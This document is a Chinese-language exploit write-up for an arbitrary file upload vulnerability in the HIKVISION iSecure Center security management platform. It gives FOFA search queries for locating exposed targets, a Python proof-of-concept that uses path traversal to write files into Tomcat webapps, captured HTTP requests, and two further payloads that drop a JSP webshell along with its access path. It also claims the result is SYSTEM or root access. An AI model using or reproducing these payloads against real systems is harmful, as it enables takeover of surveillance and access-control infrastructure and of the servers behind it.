2023Hvv/海康卫视前台上传.md

**2. 漏洞描述**
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备，获取边缘节点数据，实现安防信息化集成与联动，以电子地图为载体，融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、统一配置、统一管理和统一调度。海康威视isecure center 综合安防管理平台存在任意文件上传漏洞
**3. 影响版本**

HIKVISION iSecure Center综合安防管理平台,在野。
**4. fofa查询语句**

icon_hash=“-808437027”
app=“HIKVISION-iSecure-Center”

## **5. 漏洞复现**

EXP/POC：payload.py 脚本 走127.0.0.1:8080 代理，方便burpsuit抓包。

```
#!usr/bin/env python
# *-* coding:utf-8 *-*
import sys
import requests
import string
import random
import urllib3
urllib3.disable_warnings()

proxies = {
    'http': 'http://127.0.0.1:8080', 
    'https': 'http://127.0.0.1:8080', #127.0.0.1:8080 代理，方便burpsuit抓包
}

def run(arg):
    try:
        flag=''.join(random.choices(string.ascii_uppercase + string.digits, k = 9))
        filename=''.join(random.choices(string.ascii_uppercase + string.digits, k = 10))
        vuln_url=arg+"center/api/files;.js"
        headers={'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)',
                 'Accept': '*/*',
                 'Content-Type': 'application/x-www-form-urlencoded'}
        file = {'file': (f'../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{filename}.txt', flag, 'application/octet-stream')}
        r = requests.post(vuln_url, files=file, timeout=15, verify=False, proxies=proxies)
        if r.status_code==200 and "webapps/clusterMgr" in r.text:

            payload=f"clusterMgr/{filename}.txt;.js"
            url=arg+payload
            r2 = requests.get(url, timeout=15, verify=False, proxies=proxies)
            if r2.status_code==200 and flag in r2.text:

                print('\033[1;31;40m')
                print(arg+f":存在海康威视isecure center 综合安防管理平台存在任意文件上传漏洞\nshell地址：{url}")
                print('\033[0m')



        else:
            print(arg+":不存在漏洞")
    except:
        print(arg+":不存在漏洞")


if __name__ == '__main__':
    url=sys.argv[1]
    run(url)
```

## **6. burpsuit抓包分析**

burpsuit 127.0.0.1:8080抓包，抓取post 包一个，get 请求包一个。
payload：请求数据包

```

POST /center/api/files;.js HTTP/1.1
Host: x.x.x.x
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 258
Content-Type: multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4

--e54e7e5834c8c50e92189959fe7227a4
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt"
Content-Type: application/octet-stream

9YPQ3I3ZS
--e54e7e5834c8c50e92189959fe7227a4--
```

**payload的返回数据包。**

```
HTTP/1.1 200 
Server: openresty/1.13.6.2
Date: Fri, 14 Jul 2023 04:35:23 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 335
Connection: close
Set-Cookie: JSESSIONID=0A235873FB1C02C345345C0D36A4C709; Path=/center; HttpOnly
Content-Language: en_US
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Content-Disposition: inline;filename=f.txt

{"code":"0","data":{"filename":"../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/
```

访问漏洞链接：https://x.x.x.x/clusterMgr/2BT5AV96QW.txt;.js ，查看是否上传成功。

因为Hikvision平台使用的中间件为tomcat，修改报文和文件名，所以实现上传哥斯拉生成jsp。
宿主服务器windows和linux都可使用。windows 拿到的账户是system账户，linux为root。
Hikvison账户管理密码的后渗透操作：海康威视综合安防后渗透利用技巧



POC2

```
POST /center/api/files;.html HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<%jsp的马%>
------WebKitFormBoundary9PggsiM755PLa54a--
```



 **report 任意文件上传漏洞**

```
POST /svm/api/external/report HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<%jsp的马%>

------WebKitFormBoundary9PggsiM755PLa54a--
```

**马儿路径：/portal/ui/login/..;/..;/new.jsp**